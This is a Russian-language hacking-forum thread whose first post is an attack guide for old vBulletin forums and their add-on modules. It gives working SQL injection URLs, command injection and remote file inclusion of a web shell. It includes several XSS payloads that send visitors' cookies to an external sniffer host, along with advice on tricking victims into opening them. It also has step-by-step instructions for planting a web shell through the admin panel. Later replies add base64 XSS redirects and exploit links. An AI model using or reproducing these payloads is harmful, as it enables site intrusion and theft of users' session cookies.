[Взлом] Обзор уязвимостей vBulletin

Тема в разделе "Статьи и Co", создана пользователем fantom-hm, 28 июн 2007.

Статус темы:
Закрыта.
  1. fantom-hm

    fantom-hm Писатель

    Заблокирован
    Регистр.:
    10 ноя 2006
    Сообщения:
    20
    Симпатии:
    16
    Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*.

    Узнаём версию форума.

    В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.
    Код:
    vbulletin_ajax_threadslist.js
    vbulletin_ajax_namesugg.js
    vbulletin_attachment.js
    vbulletin_cpcolorpicker.js
    vbulletin_editor.js
    Пример:
    Код:
    www.xz.сom/forumpath/clientscript/vbulletin_editor.css



    vBulletin 2

    2.2.* - 2.2.4 - Выполнение произвольного кода
    Описание уязвимости: уязвимость в vBulletin's Calendar PHP сценарии (calender.php) позволяет удаленному атакующему выполнять произвольный код в контексте пользователя 'nobody'.
    Exploit: http://www.securitylab.ru/vulnerability/source/207147.php


    2.3.* - SQL injection
    Описанте уязвимости: уязвимость в проверке правильности входных данных в 'calendar.php'. Удаленный пользователь может внедрить произвольные SQL команды.
    Пример:
    Код:
    www.xz.сom/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate


    2.*.* - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки тэга email.
    Exploit:
    Код:
    [E*MAIL]aaa@aaa.aa"'s='[/E*MAIL]' sss="i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null" style=top:expression(eval(this.sss));

    Video: http://video.antichat.ru/file57.html





    vBulletin 3.0

    3.0.0 - XSS
    Описание уязвимости: уязвимость существует в сценарии search.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Код:
    www.xz.сom/forumpath//search.php?do=process&showposts=0&query=<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

    3.0-3.0.4 - Выполнение произвольных команд
    Описание уязвимости: уязвимость существует в сценарии forumdisplay.php из-за некорректной обработки глобальных переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на системе.
    Пример:
    Код:
    www.xz.сom/forumpath/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

    О командах читать здесь: http://forum.antichat.ru/threadnav7345-1-10.html

    3.0.3–3.0.9 XSS
    Описание уязвимости: уязвимость существует при обработке входных данных в поле Статус. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
    Примечание: менять свой статус по умолчанию может только администрация, начиная от группы Модераторы.
    Пример:
    Код:
    <body onLoad=img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;>


    3.0.9 and 3.5.4 - XSS
    Описание уязвимости: звимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Код:
    www.xz.сom/forumpath/newthread.php?...8b082b6d3381cbee17f1f1aca&poststarttime='+img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%E2%F3%FE+%F2% E5%EC%F3&parseurl=1&disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&stickunstick=1&iconid=0




    vBulletin 3.5

    3.5.2 - XSS
    Описание уязвимости: Уязвимость существует при обработке входных данных в поле "title" в сценарии "calendar.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Код:
    TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    BODY:---------->No matter
    OTHER OPTIONS:->No matter

    Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.

    3.5.3 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в поле "Email Address" в модуле "Edit Email & Password". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Примечание: удачная эксплуатация уязвимости возможна при включенных опциях "Enable Email features" и "Allow Users to Email Other Member".
    Пример:
    Код:
    www.xz.сom/forumpath/profile.php?do=editpassword
    pass:your pass
    email: vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt
    Note About lenght limitation
    ****
    forum/profile.php?do=editoptions
    Receive Email from Other Members=yes
    ****
    www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}

    Пояснение: заходим в профиль и в поле email прописываем vashe@milo.com”><script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>.nomatt. Cохраняем. Потом ставим в опциях свой емайл видимым для всех. Теперь втравливаем кому нибудь ссылку www.xz.сom/forumpath/sendmessage.php?do=mailmember&u={your id}, где {your id} ваш id. Cookie уйдут на снифер.

    3.5.4 - Дамп БД
    Описание уязвимости: уязвимость существует из-за недостаточного ограничения на доступ к сценарию upgrade_301.php в каталоге 'install'. Удаленный пользователь может с помощью специально сформированного URL сделать дамп базы данных приложения.
    Пример:
    Код:
    www.xz.com/forumpath/install/upgrade_301.php?step=SomeWord


    3.5.4 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Код:
    www.xz.сom/forumpath/inlinemod.php?do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a





    Уязвимости в модулях vBulletin.

    vBug Tracker 3.5.1 - XSS
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "sortorder" сценария vbugs.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
    Пример:
    Код:
    www.xz.сom/forumpath/vbugs.php?do=l...t=0&sortfield=lastedit&sortorder="<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;%3C/script%3E


    ImpEx 1.74 - PHP-инклюдинг и выполнение команд
    Описание уязвимости: уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
    Пример:
    Код:
    www.xz.сom/forumpath/impex/ImpExData.php?systempath=http://rst.void.ru/download/r57shell.txt
    www.xz.сom/forumpath/impex/ImpExData.php?systempath=../../../../../../../../etc/passwd

    Exploit: http://www.securitylab.ru/vulnerability/source/264410.php

    ibProArcade 2.x - SQL injection
    Описание уязвимости: Уязвимость существует в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
    Пример:
    Код:
    www.xz.сom/forumpath/index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

    Где [any_user] id нужного нам юзера.



    При использовании XSS c указанным в теме снифером. Логи смотреть тут: http://antichat.ru/sniff/log.php
    Но лучше завести себе свой снифер -). Это можно сделать тут: http://antichat.ru/sniffer или тут: http://s.netsec.ru.





    Шелл в vBulletin.

    Разберёмся как залить шелл из админки воблы.


    Способ заливки шелла в vBulletin 2.*.* и 3.0.*
    1. Заходим в админку.
    2. Смайлы.
    3. Загрузить смайл.
    4. Грузим наш шелл. (папка по умолчанию /images/smilies)
    5. Заходим www.xz.сom/forumpath/images/smilies/shell.php
    Примечание: сработает не везде.


    Способ заливки шелла в vBulletin 3.5.*.
    1. Заходим в админку.
    2. Система модулей.
    3. Добавить новый модуль.
    Продукт: ставим vBulletin
    Месторасположение: Vbulletin: Справка - faq_complete
    Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
    4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда
     
    lift нравится это.
  2. Aftal1ck

    Aftal1ck Создатель

    Регистр.:
    22 дек 2007
    Сообщения:
    44
    Симпатии:
    9
    3.6.4 бы и выше...
    варианты что указаны выше уже мало где пройдут
     
  3. Artem_007

    Artem_007 Постоялец

    Регистр.:
    13 апр 2008
    Сообщения:
    81
    Симпатии:
    13
    XSS (3.7.1 & 3.6.10)

    XSS-base64

    _http://securityvulns.ru/news/CGI/2008.06.14.html
    _http://securityvulns.ru/news/CGI/2008.06.19.html

    Exploit:

    http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64,
    PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

    http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,
    PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
     
  4. needmoney

    needmoney Создатель

    Регистр.:
    3 дек 2008
    Сообщения:
    18
    Симпатии:
    0
    vBulletin 3.5.4

    есть акктуальная инфа по взлому форума vBulletin 3.5.4?
    очень-очень требуется!
     
  5. WuZi

    WuZi Постоялец

    Регистр.:
    2 окт 2008
    Сообщения:
    96
    Симпатии:
    37
    Уязвимости есть, но это как бы старая версия, потому врятли будет работать

    Попробуй это (связка из 3-х сплоитов)


    http://forum.tgbr.in/forum149/thread1378.html


    А вот эти сплоиты по отдельности

    http://www.mail-archive.com/bugtraq@securityfocus.com/msg17835.html
    http://securityvulns.com/Ndocument432.html
    http://securityvulns.com/Ldocument956.html - xss больше всего шансов, что прокатит, но тоже врятли


    И это попробуй

    http://www.nukedx.com/?viewdoc=26
     
Статус темы:
Закрыта.